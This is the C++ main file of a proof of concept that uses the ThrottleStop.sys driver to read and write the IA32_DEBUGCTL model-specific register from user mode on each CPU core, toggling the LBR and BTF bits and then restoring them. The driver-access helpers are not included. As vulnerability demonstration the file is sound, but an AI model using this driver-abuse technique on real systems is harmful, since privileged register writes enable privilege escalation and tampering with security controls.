main.cpp
#include "includes.h"
#define IA32_DEBUGCTL 0x1D9
// Prints a "press Enter to continue" prompt (Portuguese), blocks until the
// shell's `pause` builtin returns, then emits a trailing newline.
// `pause>nul` discards the builtin's own message so only our prompt is shown.
// Relies on system(), so it only behaves as intended under a Windows cmd shell.
void pause( )
{
    fputs( "\nPressione Enter para continuar", stdout );
    system( "pause>nul" );
    putchar( '\n' );
}
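// Pins the current process to one logical core, flips the `lbr` and `btf`
// fields of IA32_DEBUGCTL on that core, reads the result back, and then puts
// the register back to the value it held on entry.
//
// core_id is 1-based: bit (core_id - 1) of the affinity mask is set.
//
// MSR access goes through exploit::read_msr / exploit::write_msr, which are
// defined elsewhere; this function only reports their success or failure.
// DebugCtl is also declared elsewhere - presumably `value` overlays the
// `lbr` / `btf` bit-fields (TODO confirm against includes.h).
//
// NOTE(review): the affinity mask is not restored, so the process stays
// pinned to `core_id` after this function returns.
void toggle_lbr_btf_flags_on_core( uint32_t core_id )
{
    // The affinity mask is a pointer-sized bit set. An id of 0 would shift by
    // (0 - 1) == UINT32_MAX and an id above the mask width would shift past
    // the end of the type; both are undefined behaviour, so reject them.
    constexpr uint32_t mask_bits = static_cast<uint32_t>( sizeof( void* ) * 8 );
    if ( core_id == 0 || core_id > mask_bits )
    {
        printf( "\t[ ! ] Core invalido\n" );
        return;
    }

    printf( "\t[ + ] Setando Affinity Mask para o Core %d\n\n", core_id );

    if ( !SetProcessAffinityMask( GetCurrentProcess( ), static_cast<uint64_t>( 1 ) << ( core_id - 1 ) ) )
    {
        // Without the pin, the MSR accesses below could land on any core;
        // say so instead of returning silently.
        printf( "\t[ ! ] Erro a definir a Affinity Mask\n" );
        return;
    }

    DebugCtl debug_ctl;

    if ( !exploit::read_msr( IA32_DEBUGCTL, &debug_ctl.value ) )
    {
        printf( "\t[ ! ] Erro a ler o MSR\n" );
        return;
    }
    printf( "\t[ + ] LBR: %d | BTF: %d\n\t[ + ] Alternando Valores\n\n", debug_ctl.lbr, debug_ctl.btf );

    // Keep the entry value so the restore step below does not depend on what
    // a later read returns. Deriving the "restore" value from a second read
    // would leave the register modified whenever the first write did not
    // take effect as requested, or whenever that read failed.
    auto original_value = debug_ctl.value;

    debug_ctl.lbr = !debug_ctl.lbr;
    debug_ctl.btf = !debug_ctl.btf;

    if ( !exploit::write_msr( IA32_DEBUGCTL, debug_ctl.value ) )
    {
        printf( "\t[ ! ] Erro a escrever no MSR\n" );
        return;
    }

    // Read back to show what the register holds after the write.
    if ( exploit::read_msr( IA32_DEBUGCTL, &debug_ctl.value ) )
        printf( "\t[ + ] LBR: %d | BTF: %d\n\t[ + ] Alternando Valores\n\n", debug_ctl.lbr, debug_ctl.btf );
    else
        printf( "\t[ ! ] Erro a ler o MSR\n" );

    // Restore the exact entry value, even if the read-back above failed.
    if ( !exploit::write_msr( IA32_DEBUGCTL, original_value ) )
    {
        // The register may still hold the flipped bits on this core.
        printf( "\t[ ! ] Erro a escrever no MSR\n" );
        return;
    }

    if ( exploit::read_msr( IA32_DEBUGCTL, &debug_ctl.value ) )
        printf( "\t[ + ] LBR: %d | BTF: %d\n", debug_ctl.lbr, debug_ctl.btf );
    else
        printf( "\t[ ! ] Erro a ler o MSR\n" );
}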
// Entry point of the proof of concept.
//
// Flow: show a banner, open a handle through exploit::open_handle(), then call
// toggle_lbr_btf_flags_on_core() once per logical processor reported by
// GetSystemInfo, and finally close the handle. Returns 1 if the handle cannot
// be opened, 0 otherwise.
//
// As the banner states, the ThrottleStop.sys driver must already be running;
// the exploit:: helpers (defined elsewhere) presumably talk to it through the
// opened handle. From a defender's point of view that loaded driver is the
// precondition for the user-mode MSR access shown here.
int main( )
{
    system( "title ThrottleStop PoC by M47Z" );

    printf( "\n\tThrottleStop R/W MSR Exploit PoC by M47Z\n\nE necessario o driver (ThrottleStop.sys) estar a correr no computador antes do programa ser executado\n" );

    pause( );

    printf( "[ + ] Abrindo Handle\n" );

    if ( exploit::open_handle( ) )
    {
        SYSTEM_INFO info { };
        GetSystemInfo( &info );

        printf( "[ + ] CPU com %d logical cores\n[ + ] Iterando core por core para alternar os bits LBR e BTF presentes no MSR IA32_DEBUGCTL\n\n", info.dwNumberOfProcessors );

        // Core ids are 1-based here; the callee turns id N into mask bit N-1.
        uint32_t core = 1;
        while ( core <= info.dwNumberOfProcessors )
        {
            printf( "\nCore %d\n", core );
            toggle_lbr_btf_flags_on_core( core );
            core++;
        }

        printf( "\n[ + ] Fechando Handle\n" );
        exploit::close_handle( );

        pause( );
        return 0;
    }

    // Handle could not be opened: report, wait for the user, and bail out.
    printf( "[ ! ] Erro a Abrir Handle..." );
    pause( );
    return 1;
}